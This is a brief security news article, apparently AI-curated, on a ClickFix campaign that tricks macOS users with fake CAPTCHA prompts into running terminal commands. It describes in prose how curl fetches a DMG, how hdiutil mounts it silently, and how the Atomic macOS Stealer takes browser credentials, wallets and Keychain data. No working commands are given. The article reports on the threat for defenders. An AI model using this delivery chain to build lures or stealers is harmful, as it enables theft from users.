Skip to content

ClickFix Campaign Uses Terminal Commands for Fully Automated macOS Malware Deployment

Bottom Line: A new ClickFix campaign automates malware downloads on macOS entirely through terminal commands, with Atomic macOS Stealer stealing passwords, browser data, and cryptocurrency wallet holdings.

According to security researchers from Palo Alto Networks Unit 42, a new ClickFix campaign infects macOS systems through fake CAPTCHA prompts that trick users into executing terminal commands. These download malicious DMG files in the background without leaving filesystem traces.

Attackers use prepared web pages with spoofed system error messages or CAPTCHA prompts. They deceive users into copying and executing a provided terminal command. This command uses the system utility curl to download a malicious disk image file (DMG) from an external server and store it in a temporary directory.

Unlike earlier campaigns where users had to manually open the DMG file, the script fully automates this step. It uses the macOS command hdiutil with the -nobrowse parameter to mount the disk image without displaying icons in Finder or on the desktop. The script then searches the directory structure for installation files and executes the found application – in documented cases, a self-signed package called NNApp.app.

The injected payload is a variant of Atomic macOS Stealer (AMOS). Once activated, the malware displays a fake password prompt mimicking macOS system preferences. It attempts to extract the user’s administrator password. The malware is designed to steal data from eight Chromium-based browsers such as Google Chrome, Microsoft Edge, and Brave, as well as from five Firefox derivatives such as LibreWolf and Tor Browser – including cookies, saved passwords, credit card data, and browser profiles.

Additionally, the malware targets cryptocurrency wallets (Exodus, Electrum, Binance Wallet, TonKeeper) as well as Apple Notes, local documents, and Keychain databases. A particularly critical aspect is that the malware replaces legitimate installations of Ledger Live and Trezor Suite with manipulated versions to directly steal digital assets. All collected data is compressed and transmitted to the attackers’ command servers.


Source: www.it-daily.net · Published 25 June 2026
Lumi AI News — AI-assisted curation pursuant to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.

Share on: